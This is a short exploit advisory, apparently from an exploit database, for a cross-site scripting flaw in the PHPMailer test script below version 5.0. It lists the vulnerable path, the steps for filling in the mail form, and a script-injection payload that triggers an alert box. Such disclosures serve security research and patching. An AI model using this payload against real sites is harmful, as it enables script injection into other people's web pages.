# Exploit Title: PHPMailer Test Page < 5.0 Cross-Site-Scripting
# Date: 2018-07-06
# Exploit Author: Omba
# Vendor Homepage: https://github.com/PHPMailer
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: [5.0]
# CVE: N/A
# Tested on: MacOS High Sierra / Linux Mint / Windows 10
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: www.example.com/phpmailer/test_script/
# Proof of Concepts:
www.example.com/phpmailer/test_script/
fill in all the fields "Mail Details"
Payload: “><script>alert(/Xss-By-Omba/)</script>
and click Submit.